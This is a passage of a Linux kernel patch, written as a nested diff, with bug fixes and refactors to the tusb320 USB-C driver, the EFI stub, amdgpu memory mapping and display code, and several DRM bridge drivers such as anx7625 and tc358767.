+@@ -78,6 +78,7 @@ struct tusb320_priv {
+ 	struct typec_capability	cap;
+ 	enum typec_port_type port_type;
+ 	enum typec_pwr_opmode pwr_opmode;
++	struct fwnode_handle *connector_fwnode;
+ };
+ 
+ static const char * const tusb_attached_states[] = {
+@@ -391,27 +392,25 @@ static int tusb320_typec_probe(struct i2c_client *client,
+ 	/* Type-C connector found. */
+ 	ret = typec_get_fw_cap(&priv->cap, connector);
+ 	if (ret)
+-		return ret;
++		goto err_put;
+ 
+ 	priv->port_type = priv->cap.type;
+ 
+ 	/* This goes into register 0x8 field CURRENT_MODE_ADVERTISE */
+ 	ret = fwnode_property_read_string(connector, "typec-power-opmode", &cap_str);
+ 	if (ret)
+-		return ret;
++		goto err_put;
+ 
+ 	ret = typec_find_pwr_opmode(cap_str);
+ 	if (ret < 0)
+-		return ret;
+-	if (ret == TYPEC_PWR_MODE_PD)
+-		return -EINVAL;
++		goto err_put;
+ 
+ 	priv->pwr_opmode = ret;
+ 
+ 	/* Initialize the hardware with the devicetree settings. */
+ 	ret = tusb320_set_adv_pwr_mode(priv);
+ 	if (ret)
+-		return ret;
++		goto err_put;
+ 
+ 	priv->cap.revision		= USB_TYPEC_REV_1_1;
+ 	priv->cap.accessory[0]		= TYPEC_ACCESSORY_AUDIO;
+@@ -422,14 +421,28 @@ static int tusb320_typec_probe(struct i2c_client *client,
+ 	priv->cap.fwnode		= connector;
+ 
+ 	priv->port = typec_register_port(&client->dev, &priv->cap);
+-	if (IS_ERR(priv->port))
+-		return PTR_ERR(priv->port);
++	if (IS_ERR(priv->port)) {
++		ret = PTR_ERR(priv->port);
++		goto err_put;
++	}
++
++	priv->connector_fwnode = connector;
+ 
+ 	return 0;
++
++err_put:
++	fwnode_handle_put(connector);
++
++	return ret;
+ }
+ 
+-static int tusb320_probe(struct i2c_client *client,
+-			 const struct i2c_device_id *id)
++static void tusb320_typec_remove(struct tusb320_priv *priv)
++{
++	typec_unregister_port(priv->port);
++	fwnode_handle_put(priv->connector_fwnode);
++}
++
++static int tusb320_probe(struct i2c_client *client)
+ {
+ 	struct tusb320_priv *priv;
+ 	const void *match_data;
+@@ -439,7 +452,9 @@ static int tusb320_probe(struct i2c_client *client,
+ 	priv = devm_kzalloc(&client->dev, sizeof(*priv), GFP_KERNEL);
+ 	if (!priv)
+ 		return -ENOMEM;
++
+ 	priv->dev = &client->dev;
++	i2c_set_clientdata(client, priv);
+ 
+ 	priv->regmap = devm_regmap_init_i2c(client, &tusb320_regmap_config);
+ 	if (IS_ERR(priv->regmap))
+@@ -490,10 +505,19 @@ static int tusb320_probe(struct i2c_client *client,
+ 					tusb320_irq_handler,
+ 					IRQF_TRIGGER_FALLING | IRQF_ONESHOT,
+ 					client->name, priv);
++	if (ret)
++		tusb320_typec_remove(priv);
+ 
+ 	return ret;
+ }
+ 
++static void tusb320_remove(struct i2c_client *client)
++{
++	struct tusb320_priv *priv = i2c_get_clientdata(client);
++
++	tusb320_typec_remove(priv);
++}
++
+ static const struct of_device_id tusb320_extcon_dt_match[] = {
+ 	{ .compatible = "ti,tusb320", .data = &tusb320_ops, },
+ 	{ .compatible = "ti,tusb320l", .data = &tusb320l_ops, },
+@@ -502,7 +526,8 @@ static const struct of_device_id tusb320_extcon_dt_match[] = {
+ MODULE_DEVICE_TABLE(of, tusb320_extcon_dt_match);
+ 
+ static struct i2c_driver tusb320_extcon_driver = {
+-	.probe		= tusb320_probe,
++	.probe_new	= tusb320_probe,
++	.remove		= tusb320_remove,
+ 	.driver		= {
+ 		.name	= "extcon-tusb320",
+ 		.of_match_table = tusb320_extcon_dt_match,
+diff --git a/drivers/extcon/extcon.c b/drivers/extcon/extcon.c
+index e1c71359b6051..7141dd0d407d8 100644
+--- a/drivers/extcon/extcon.c
++++ b/drivers/extcon/extcon.c
+@@ -206,6 +206,14 @@ static const struct __extcon_info {
+  * @attr_name:		"name" sysfs entry
+  * @attr_state:		"state" sysfs entry
+  * @attrs:		the array pointing to attr_name and attr_state for attr_g
++ * @usb_propval:	the array of USB connector properties
++ * @chg_propval:	the array of charger connector properties
++ * @jack_propval:	the array of jack connector properties
++ * @disp_propval:	the array of display connector properties
++ * @usb_bits:		the bit array of the USB connector property capabilities
++ * @chg_bits:		the bit array of the charger connector property capabilities
++ * @jack_bits:		the bit array of the jack connector property capabilities
++ * @disp_bits:		the bit array of the display connector property capabilities
+  */
+ struct extcon_cable {
+ 	struct extcon_dev *edev;
+diff --git a/drivers/firmware/efi/libstub/efi-stub-helper.c b/drivers/firmware/efi/libstub/efi-stub-helper.c
+index 0c493521b25b8..3d9b2469a0dfd 100644
+--- a/drivers/firmware/efi/libstub/efi-stub-helper.c
++++ b/drivers/firmware/efi/libstub/efi-stub-helper.c
+@@ -521,6 +521,9 @@ efi_status_t efi_exit_boot_services(void *handle, void *priv,
+ 	struct efi_boot_memmap *map;
+ 	efi_status_t status;
+ 
++	if (efi_disable_pci_dma)
++		efi_pci_disable_bridge_busmaster();
++
+ 	status = efi_get_memory_map(&map, true);
+ 	if (status != EFI_SUCCESS)
+ 		return status;
+@@ -531,9 +534,6 @@ efi_status_t efi_exit_boot_services(void *handle, void *priv,
+ 		return status;
+ 	}
+ 
+-	if (efi_disable_pci_dma)
+-		efi_pci_disable_bridge_busmaster();
+-
+ 	status = efi_bs_call(exit_boot_services, handle, map->map_key);
+ 
+ 	if (status == EFI_INVALID_PARAMETER) {
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c
+index 365e3fb6a9e5b..b60b6e6149bf7 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c
+@@ -129,9 +129,6 @@ static int amdgpu_cs_p1_user_fence(struct amdgpu_cs_parser *p,
+ 	bo = amdgpu_bo_ref(gem_to_amdgpu_bo(gobj));
+ 	p->uf_entry.priority = 0;
+ 	p->uf_entry.tv.bo = &bo->tbo;
+-	/* One for TTM and two for the CS job */
+-	p->uf_entry.tv.num_shared = 3;
+-
+ 	drm_gem_object_put(gobj);
+ 
+ 	size = amdgpu_bo_size(bo);
+@@ -883,15 +880,19 @@ static int amdgpu_cs_parser_bos(struct amdgpu_cs_parser *p,
+ 
+ 	mutex_lock(&p->bo_list->bo_list_mutex);
+ 
+-	/* One for TTM and one for the CS job */
++	/* One for TTM and one for each CS job */
+ 	amdgpu_bo_list_for_each_entry(e, p->bo_list)
+-		e->tv.num_shared = 2;
++		e->tv.num_shared = 1 + p->gang_size;
++	p->uf_entry.tv.num_shared = 1 + p->gang_size;
+ 
+ 	amdgpu_bo_list_get_list(p->bo_list, &p->validated);
+ 
+ 	INIT_LIST_HEAD(&duplicates);
+ 	amdgpu_vm_get_pd_bo(&fpriv->vm, &p->validated, &p->vm_pd);
+ 
++	/* Two for VM updates, one for TTM and one for each CS job */
++	p->vm_pd.tv.num_shared = 3 + p->gang_size;
++
+ 	if (p->uf_entry.tv.bo && !ttm_to_amdgpu_bo(p->uf_entry.tv.bo)->parent)
+ 		list_add(&p->uf_entry.tv.head, &p->validated);
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_psp.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_psp.c
+index a3cd816f98a14..0af9fb4098e8a 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_psp.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_psp.c
+@@ -1959,6 +1959,8 @@ static int psp_securedisplay_initialize(struct psp_context *psp)
+ 		psp_securedisplay_parse_resp_status(psp, securedisplay_cmd->status);
+ 		dev_err(psp->adev->dev, "SECUREDISPLAY: query securedisplay TA failed. ret 0x%x\n",
+ 			securedisplay_cmd->securedisplay_out_message.query_ta.query_cmd_ret);
++		/* don't try again */
++		psp->securedisplay_context.context.bin_desc.size_bytes = 0;
+ 	}
+ 
+ 	return 0;
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_ras.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_ras.c
+index a4b47e1bd111d..09fc464f5f128 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_ras.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_ras.c
+@@ -170,8 +170,7 @@ static int amdgpu_reserve_page_direct(struct amdgpu_device *adev, uint64_t addre
+ 
+ 	memset(&err_rec, 0x0, sizeof(struct eeprom_table_record));
+ 	err_data.err_addr = &err_rec;
+-	amdgpu_umc_fill_error_record(&err_data, address,
+-			(address >> AMDGPU_GPU_PAGE_SHIFT), 0, 0);
++	amdgpu_umc_fill_error_record(&err_data, address, address, 0, 0);
+ 
+ 	if (amdgpu_bad_page_threshold != 0) {
+ 		amdgpu_ras_add_bad_pages(adev, err_data.err_addr,
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_vm.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_vm.c
+index 5a8a4cda7e987..58fe7279599f0 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_vm.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_vm.c
+@@ -1427,14 +1427,14 @@ int amdgpu_vm_bo_map(struct amdgpu_device *adev,
+ 	uint64_t eaddr;
+ 
+ 	/* validate the parameters */
+-	if (saddr & ~PAGE_MASK || offset & ~PAGE_MASK ||
+-	    size == 0 || size & ~PAGE_MASK)
++	if (saddr & ~PAGE_MASK || offset & ~PAGE_MASK || size & ~PAGE_MASK)
++		return -EINVAL;
++	if (saddr + size <= saddr || offset + size <= offset)
+ 		return -EINVAL;
+ 
+ 	/* make sure object fit at this offset */
+ 	eaddr = saddr + size - 1;
+-	if (saddr >= eaddr ||
+-	    (bo && offset + size > amdgpu_bo_size(bo)) ||
++	if ((bo && offset + size > amdgpu_bo_size(bo)) ||
+ 	    (eaddr >= adev->vm_manager.max_pfn << AMDGPU_GPU_PAGE_SHIFT))
+ 		return -EINVAL;
+ 
+@@ -1493,14 +1493,14 @@ int amdgpu_vm_bo_replace_map(struct amdgpu_device *adev,
+ 	int r;
+ 
+ 	/* validate the parameters */
+-	if (saddr & ~PAGE_MASK || offset & ~PAGE_MASK ||
+-	    size == 0 || size & ~PAGE_MASK)
++	if (saddr & ~PAGE_MASK || offset & ~PAGE_MASK || size & ~PAGE_MASK)
++		return -EINVAL;
++	if (saddr + size <= saddr || offset + size <= offset)
+ 		return -EINVAL;
+ 
+ 	/* make sure object fit at this offset */
+ 	eaddr = saddr + size - 1;
+-	if (saddr >= eaddr ||
+-	    (bo && offset + size > amdgpu_bo_size(bo)) ||
++	if ((bo && offset + size > amdgpu_bo_size(bo)) ||
+ 	    (eaddr >= adev->vm_manager.max_pfn << AMDGPU_GPU_PAGE_SHIFT))
+ 		return -EINVAL;
+ 
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_mqd_manager_v9.c b/drivers/gpu/drm/amd/amdkfd/kfd_mqd_manager_v9.c
+index 0778e587a2d68..eaf084acb706f 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_mqd_manager_v9.c
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_mqd_manager_v9.c
+@@ -115,18 +115,19 @@ static struct kfd_mem_obj *allocate_mqd(struct kfd_dev *kfd,
+ 			&(mqd_mem_obj->gtt_mem),
+ 			&(mqd_mem_obj->gpu_addr),
+ 			(void *)&(mqd_mem_obj->cpu_ptr), true);
++
++		if (retval) {
++			kfree(mqd_mem_obj);
++			return NULL;
++		}
+ 	} else {
+ 		retval = kfd_gtt_sa_allocate(kfd, sizeof(struct v9_mqd),
+ 				&mqd_mem_obj);
+-	}
+-
+-	if (retval) {
+-		kfree(mqd_mem_obj);
+-		return NULL;
++		if (retval)
++			return NULL;
+ 	}
+ 
+ 	return mqd_mem_obj;
+-
+ }
+ 
+ static void init_mqd(struct mqd_manager *mm, void **mqd,
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index 91c308cf27eb2..9be3769d68a85 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -6972,13 +6972,7 @@ static int amdgpu_dm_connector_get_modes(struct drm_connector *connector)
+ 				drm_add_modes_noedid(connector, 640, 480);
+ 	} else {
+ 		amdgpu_dm_connector_ddc_get_modes(connector, edid);
+-		/* most eDP supports only timings from its edid,
+-		 * usually only detailed timings are available
+-		 * from eDP edid. timings which are not from edid
+-		 * may damage eDP
+-		 */
+-		if (connector->connector_type != DRM_MODE_CONNECTOR_eDP)
+-			amdgpu_dm_connector_add_common_modes(encoder, connector);
++		amdgpu_dm_connector_add_common_modes(encoder, connector);
+ 		amdgpu_dm_connector_add_freesync_modes(connector, edid);
+ 	}
+ 	amdgpu_dm_fbc_init(connector);
+@@ -8873,6 +8867,8 @@ static int dm_update_crtc_state(struct amdgpu_display_manager *dm,
+ 
+ 		/* Now check if we should set freesync video mode */
+ 		if (amdgpu_freesync_vid_mode && dm_new_crtc_state->stream &&
++		    dc_is_stream_unchanged(new_stream, dm_old_crtc_state->stream) &&
++		    dc_is_stream_scaling_unchanged(new_stream, dm_old_crtc_state->stream) &&
+ 		    is_timing_unchanged_for_freesync(new_crtc_state,
+ 						     old_crtc_state)) {
+ 			new_crtc_state->mode_changed = false;
+diff --git a/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn30/dcn30_clk_mgr_smu_msg.c b/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn30/dcn30_clk_mgr_smu_msg.c
+index 1fbf1c105dc12..bdbf183066981 100644
+--- a/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn30/dcn30_clk_mgr_smu_msg.c
++++ b/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn30/dcn30_clk_mgr_smu_msg.c
+@@ -312,6 +312,9 @@ void dcn30_smu_set_display_refresh_from_mall(struct clk_mgr_internal *clk_mgr, b
+ 	/* bits 8:7 for cache timer scale, bits 6:1 for cache timer delay, bit 0 = 1 for enable, = 0 for disable */
+ 	uint32_t param = (cache_timer_scale << 7) | (cache_timer_delay << 1) | (enable ? 1 : 0);
+ 
++	smu_print("SMU Set display refresh from mall: enable = %d, cache_timer_delay = %d, cache_timer_scale = %d\n",
++		enable, cache_timer_delay, cache_timer_scale);
++
+ 	dcn30_smu_send_msg_with_param(clk_mgr,
+ 			DALSMC_MSG_SetDisplayRefreshFromMall, param, NULL);
+ }
+diff --git a/drivers/gpu/drm/amd/display/dc/core/dc.c b/drivers/gpu/drm/amd/display/dc/core/dc.c
+index 087a4838488b2..b405f2e86927d 100644
+--- a/drivers/gpu/drm/amd/display/dc/core/dc.c
++++ b/drivers/gpu/drm/amd/display/dc/core/dc.c
+@@ -2360,9 +2360,6 @@ static enum surface_update_type det_surface_update(const struct dc *dc,
+ 	enum surface_update_type overall_type = UPDATE_TYPE_FAST;
+ 	union surface_update_flags *update_flags = &u->surface->update_flags;
+ 
+-	if (u->flip_addr)
+-		update_flags->bits.addr_update = 1;
+-
+ 	if (!is_surface_in_context(context, u->surface) || u->surface->force_full_update) {
+ 		update_flags->raw = 0xFFFFFFFF;
+ 		return UPDATE_TYPE_FULL;
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn21/display_mode_vba_21.c b/drivers/gpu/drm/amd/display/dc/dml/dcn21/display_mode_vba_21.c
+index b7c2844d0cbee..f294f2f8c75bc 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn21/display_mode_vba_21.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn21/display_mode_vba_21.c
+@@ -810,7 +810,7 @@ static bool CalculatePrefetchSchedule(
+ 			*swath_width_chroma_ub = dml_ceil(SwathWidthY / 2 - 1, myPipe->BlockWidth256BytesC) + myPipe->BlockWidth256BytesC;
+ 	} else {
+ 		*swath_width_luma_ub = dml_ceil(SwathWidthY - 1, myPipe->BlockHeight256BytesY) + myPipe->BlockHeight256BytesY;
+-		if (myPipe->BlockWidth256BytesC > 0)
++		if (myPipe->BlockHeight256BytesC > 0)
+ 			*swath_width_chroma_ub = dml_ceil(SwathWidthY / 2 - 1, myPipe->BlockHeight256BytesC) + myPipe->BlockHeight256BytesC;
+ 	}
+ 
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_rq_dlg_calc_32.c b/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_rq_dlg_calc_32.c
+index 395ae8761980f..9ba6cb67655f4 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_rq_dlg_calc_32.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_rq_dlg_calc_32.c
+@@ -116,7 +116,7 @@ void dml32_rq_dlg_get_rq_reg(display_rq_regs_st *rq_regs,
+ 	else
+ 		rq_regs->rq_regs_l.min_meta_chunk_size = dml_log2(min_meta_chunk_bytes) - 6 + 1;
+ 
+-	if (min_meta_chunk_bytes == 0)
++	if (p1_min_meta_chunk_bytes == 0)
+ 		rq_regs->rq_regs_c.min_meta_chunk_size = 0;
+ 	else
+ 		rq_regs->rq_regs_c.min_meta_chunk_size = dml_log2(p1_min_meta_chunk_bytes) - 6 + 1;
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu11/sienna_cichlid_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu11/sienna_cichlid_ppt.c
+index 85d53597eb07a..f7ed3e655e397 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu11/sienna_cichlid_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu11/sienna_cichlid_ppt.c
+@@ -431,7 +431,13 @@ static int sienna_cichlid_append_powerplay_table(struct smu_context *smu)
+ {
+ 	struct atom_smc_dpm_info_v4_9 *smc_dpm_table;
+ 	int index, ret;
+-	I2cControllerConfig_t *table_member;
++	PPTable_beige_goby_t *ppt_beige_goby;
++	PPTable_t *ppt;
++
++	if (smu->adev->ip_versions[MP1_HWIP][0] == IP_VERSION(11, 0, 13))
++		ppt_beige_goby = smu->smu_table.driver_pptable;
++	else
++		ppt = smu->smu_table.driver_pptable;
+ 
+ 	index = get_index_into_master_table(atom_master_list_of_data_tables_v2_1,
+ 					    smc_dpm_info);
+@@ -440,9 +446,13 @@ static int sienna_cichlid_append_powerplay_table(struct smu_context *smu)
+ 				      (uint8_t **)&smc_dpm_table);
+ 	if (ret)
+ 		return ret;
+-	GET_PPTABLE_MEMBER(I2cControllers, &table_member);
+-	memcpy(table_member, smc_dpm_table->I2cControllers,
+-			sizeof(*smc_dpm_table) - sizeof(smc_dpm_table->table_header));
++
++	if (smu->adev->ip_versions[MP1_HWIP][0] == IP_VERSION(11, 0, 13))
++		smu_memcpy_trailing(ppt_beige_goby, I2cControllers, BoardReserved,
++				    smc_dpm_table, I2cControllers);
++	else
++		smu_memcpy_trailing(ppt, I2cControllers, BoardReserved,
++				    smc_dpm_table, I2cControllers);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/gpu/drm/bridge/analogix/anx7625.c b/drivers/gpu/drm/bridge/analogix/anx7625.c
+index b0ff1ecb80a50..213263ad6a064 100644
+--- a/drivers/gpu/drm/bridge/analogix/anx7625.c
++++ b/drivers/gpu/drm/bridge/analogix/anx7625.c
+@@ -1689,6 +1689,14 @@ static int anx7625_parse_dt(struct device *dev,
+ 	if (of_property_read_bool(np, "analogix,audio-enable"))
+ 		pdata->audio_en = 1;
+ 
++	return 0;
++}
++
++static int anx7625_parse_dt_panel(struct device *dev,
++				  struct anx7625_platform_data *pdata)
++{
++	struct device_node *np = dev->of_node;
++
+ 	pdata->panel_bridge = devm_drm_of_get_bridge(dev, np, 1, 0);
+ 	if (IS_ERR(pdata->panel_bridge)) {
+ 		if (PTR_ERR(pdata->panel_bridge) == -ENODEV) {
+@@ -2034,7 +2042,7 @@ static int anx7625_register_audio(struct device *dev, struct anx7625_data *ctx)
+ 	return 0;
+ }
+ 
+-static int anx7625_attach_dsi(struct anx7625_data *ctx)
++static int anx7625_setup_dsi_device(struct anx7625_data *ctx)
+ {
+ 	struct mipi_dsi_device *dsi;
+ 	struct device *dev = &ctx->client->dev;
+@@ -2044,9 +2052,6 @@ static int anx7625_attach_dsi(struct anx7625_data *ctx)
+ 		.channel = 0,
+ 		.node = NULL,
+ 	};
+-	int ret;
+-
+-	DRM_DEV_DEBUG_DRIVER(dev, "attach dsi\n");
+ 
+ 	host = of_find_mipi_dsi_host_by_node(ctx->pdata.mipi_host_node);
+ 	if (!host) {
+@@ -2067,14 +2072,24 @@ static int anx7625_attach_dsi(struct anx7625_data *ctx)
+ 		MIPI_DSI_MODE_VIDEO_HSE	|
+ 		MIPI_DSI_HS_PKT_END_ALIGNED;
+ 
+-	ret = devm_mipi_dsi_attach(dev, dsi);
++	ctx->dsi = dsi;
++
++	return 0;
++}
++
++static int anx7625_attach_dsi(struct anx7625_data *ctx)
++{
++	struct device *dev = &ctx->client->dev;
++	int ret;
++
++	DRM_DEV_DEBUG_DRIVER(dev, "attach dsi\n");
++
++	ret = devm_mipi_dsi_attach(dev, ctx->dsi);
+ 	if (ret) {
+ 		DRM_DEV_ERROR(dev, "fail to attach dsi to host.\n");
+ 		return ret;
+ 	}
+ 
+-	ctx->dsi = dsi;
+-
+ 	DRM_DEV_DEBUG_DRIVER(dev, "attach dsi succeeded.\n");
+ 
+ 	return 0;
+@@ -2562,8 +2577,41 @@ static void anx7625_runtime_disable(void *data)
+ 	pm_runtime_disable(data);
+ }
+ 
+-static int anx7625_i2c_probe(struct i2c_client *client,
+-			     const struct i2c_device_id *id)
++static int anx7625_link_bridge(struct drm_dp_aux *aux)
++{
++	struct anx7625_data *platform = container_of(aux, struct anx7625_data, aux);
++	struct device *dev = aux->dev;
++	int ret;
++
++	ret = anx7625_parse_dt_panel(dev, &platform->pdata);
++	if (ret) {
++		DRM_DEV_ERROR(dev, "fail to parse DT for panel : %d\n", ret);
++		return ret;
++	}
++
++	platform->bridge.funcs = &anx7625_bridge_funcs;
++	platform->bridge.of_node = dev->of_node;
++	if (!anx7625_of_panel_on_aux_bus(dev))
++		platform->bridge.ops |= DRM_BRIDGE_OP_EDID;
++	if (!platform->pdata.panel_bridge)
++		platform->bridge.ops |= DRM_BRIDGE_OP_HPD |
++					DRM_BRIDGE_OP_DETECT;
++	platform->bridge.type = platform->pdata.panel_bridge ?
++				    DRM_MODE_CONNECTOR_eDP :
++				    DRM_MODE_CONNECTOR_DisplayPort;
++
++	drm_bridge_add(&platform->bridge);
++
++	if (!platform->pdata.is_dpi) {
++		ret = anx7625_attach_dsi(platform);
++		if (ret)
++			drm_bridge_remove(&platform->bridge);
++	}
++
++	return ret;
++}
++
++static int anx7625_i2c_probe(struct i2c_client *client)
+ {
+ 	struct anx7625_data *platform;
+ 	struct anx7625_platform_data *pdata;
+@@ -2637,6 +2685,24 @@ static int anx7625_i2c_probe(struct i2c_client *client,
+ 	platform->aux.wait_hpd_asserted = anx7625_wait_hpd_asserted;
+ 	drm_dp_aux_init(&platform->aux);
+ 
++	ret = anx7625_parse_dt(dev, pdata);
++	if (ret) {
++		if (ret != -EPROBE_DEFER)
++			DRM_DEV_ERROR(dev, "fail to parse DT : %d\n", ret);
++		goto free_wq;
++	}
++
++	if (!platform->pdata.is_dpi) {
++		ret = anx7625_setup_dsi_device(platform);
++		if (ret < 0)
++			goto free_wq;
++	}
++
++	/*
++	 * Registering the i2c devices will retrigger deferred probe, so it
++	 * needs to be done after calls that might return EPROBE_DEFER,
++	 * otherwise we can get an infinite loop.
++	 */
+ 	if (anx7625_register_i2c_dummy_clients(platform, client) != 0) {
+ 		ret = -ENOMEM;
+ 		DRM_DEV_ERROR(dev, "fail to reserve I2C bus.\n");
+@@ -2651,13 +2717,21 @@ static int anx7625_i2c_probe(struct i2c_client *client,
+ 	if (ret)
+ 		goto free_wq;
+ 
+-	devm_of_dp_aux_populate_ep_devices(&platform->aux);
+-
+-	ret = anx7625_parse_dt(dev, pdata);
++	/*
++	 * Populating the aux bus will retrigger deferred probe, so it needs to
++	 * be done after calls that might return EPROBE_DEFER, otherwise we can
++	 * get an infinite loop.
++	 */
++	ret = devm_of_dp_aux_populate_bus(&platform->aux, anx7625_link_bridge);
+ 	if (ret) {
+-		if (ret != -EPROBE_DEFER)
+-			DRM_DEV_ERROR(dev, "fail to parse DT : %d\n", ret);
+-		goto free_wq;
++		if (ret != -ENODEV) {
++			DRM_DEV_ERROR(dev, "failed to populate aux bus : %d\n", ret);
++			goto free_wq;
++		}
++
++		ret = anx7625_link_bridge(&platform->aux);
++		if (ret)
++			goto free_wq;
+ 	}
+ 
+ 	if (!platform->pdata.low_power_mode) {
+@@ -2670,27 +2744,6 @@ static int anx7625_i2c_probe(struct i2c_client *client,
+ 	if (platform->pdata.intp_irq)
+ 		queue_work(platform->workqueue, &platform->work);
+ 
+-	platform->bridge.funcs = &anx7625_bridge_funcs;
+-	platform->bridge.of_node = client->dev.of_node;
+-	if (!anx7625_of_panel_on_aux_bus(&client->dev))
+-		platform->bridge.ops |= DRM_BRIDGE_OP_EDID;
+-	if (!platform->pdata.panel_bridge)
+-		platform->bridge.ops |= DRM_BRIDGE_OP_HPD |
+-					DRM_BRIDGE_OP_DETECT;
+-	platform->bridge.type = platform->pdata.panel_bridge ?
+-				    DRM_MODE_CONNECTOR_eDP :
+-				    DRM_MODE_CONNECTOR_DisplayPort;
+-
+-	drm_bridge_add(&platform->bridge);
+-
+-	if (!platform->pdata.is_dpi) {
+-		ret = anx7625_attach_dsi(platform);
+-		if (ret) {
+-			DRM_DEV_ERROR(dev, "Fail to attach to dsi : %d\n", ret);
+-			goto unregister_bridge;
+-		}
+-	}
+-
+ 	if (platform->pdata.audio_en)
+ 		anx7625_register_audio(dev, platform);
+ 
+@@ -2698,12 +2751,6 @@ static int anx7625_i2c_probe(struct i2c_client *client,
+ 
+ 	return 0;
+ 
+-unregister_bridge:
+-	drm_bridge_remove(&platform->bridge);
+-
+-	if (!platform->pdata.low_power_mode)
+-		pm_runtime_put_sync_suspend(&client->dev);
+-
+ free_wq:
+ 	if (platform->workqueue)
+ 		destroy_workqueue(platform->workqueue);
+@@ -2756,7 +2803,7 @@ static struct i2c_driver anx7625_driver = {
+ 		.of_match_table = anx_match_table,
+ 		.pm = &anx7625_pm_ops,
+ 	},
+-	.probe = anx7625_i2c_probe,
++	.probe_new = anx7625_i2c_probe,
+ 	.remove = anx7625_i2c_remove,
+ 
+ 	.id_table = anx7625_id,
+diff --git a/drivers/gpu/drm/bridge/ite-it6505.c b/drivers/gpu/drm/bridge/ite-it6505.c
+index 99123eec45511..292c4f6da04af 100644
+--- a/drivers/gpu/drm/bridge/ite-it6505.c
++++ b/drivers/gpu/drm/bridge/ite-it6505.c
+@@ -3085,7 +3085,7 @@ static ssize_t receive_timing_debugfs_show(struct file *file, char __user *buf,
+ 					   size_t len, loff_t *ppos)
+ {
+ 	struct it6505 *it6505 = file->private_data;
+-	struct drm_display_mode *vid = &it6505->video_info;
++	struct drm_display_mode *vid;
+ 	u8 read_buf[READ_BUFFER_SIZE];
+ 	u8 *str = read_buf, *end = read_buf + READ_BUFFER_SIZE;
+ 	ssize_t ret, count;
+@@ -3094,6 +3094,7 @@ static ssize_t receive_timing_debugfs_show(struct file *file, char __user *buf,
+ 		return -ENODEV;
+ 
+ 	it6505_calc_video_info(it6505);
++	vid = &it6505->video_info;
+ 	str += scnprintf(str, end - str, "---video timing---\n");
+ 	str += scnprintf(str, end - str, "PCLK:%d.%03dMHz\n",
+ 			 vid->clock / 1000, vid->clock % 1000);
+diff --git a/drivers/gpu/drm/bridge/tc358767.c b/drivers/gpu/drm/bridge/tc358767.c
+index b9b681086fc49..7ef78283e3d3e 100644
+--- a/drivers/gpu/drm/bridge/tc358767.c
++++ b/drivers/gpu/drm/bridge/tc358767.c
+@@ -1890,7 +1890,7 @@ static int tc_mipi_dsi_host_attach(struct tc_data *tc)
+ 	if (dsi_lanes < 0)
+ 		return dsi_lanes;
+ 
+-	dsi = mipi_dsi_device_register_full(host, &info);
++	dsi = devm_mipi_dsi_device_register_full(dev, host, &info);
+ 	if (IS_ERR(dsi))
+ 		return dev_err_probe(dev, PTR_ERR(dsi),
+ 				     "failed to create dsi device\n");
+@@ -1901,7 +1901,7 @@ static int tc_mipi_dsi_host_attach(struct tc_data *tc)
+ 	dsi->format = MIPI_DSI_FMT_RGB888;
+ 	dsi->mode_flags = MIPI_DSI_MODE_VIDEO | MIPI_DSI_MODE_VIDEO_SYNC_PULSE;
+ 
+-	ret = mipi_dsi_attach(dsi);
++	ret = devm_mipi_dsi_attach(dev, dsi);
+ 	if (ret < 0) {
+ 		dev_err(dev, "failed to attach dsi to host: %d\n", ret);
+ 		return ret;
+diff --git a/drivers/gpu/drm/bridge/tc358768.c b/drivers/gpu/drm/bridge/tc358768.c
+index 4c4b77ce8aba3..2d0ac9987b58e 100644
+--- a/drivers/gpu/drm/bridge/tc358768.c
++++ b/drivers/gpu/drm/bridge/tc358768.c
+@@ -9,6 +9,8 @@
+ #include <linux/gpio/consumer.h>
+ #include <linux/i2c.h>
+ #include <linux/kernel.h>
++#include <linux/media-bus-format.h>
++#include <linux/minmax.h>
+ #include <linux/module.h>
+ #include <linux/regmap.h>
+ #include <linux/regulator/consumer.h>
+@@ -147,6 +149,7 @@ struct tc358768_priv {
+ 
+ 	u32 pd_lines; /* number of Parallel Port Input Data Lines */
+ 	u32 dsi_lanes; /* number of DSI Lanes */
++	u32 dsi_bpp; /* number of Bits Per Pixel over DSI */
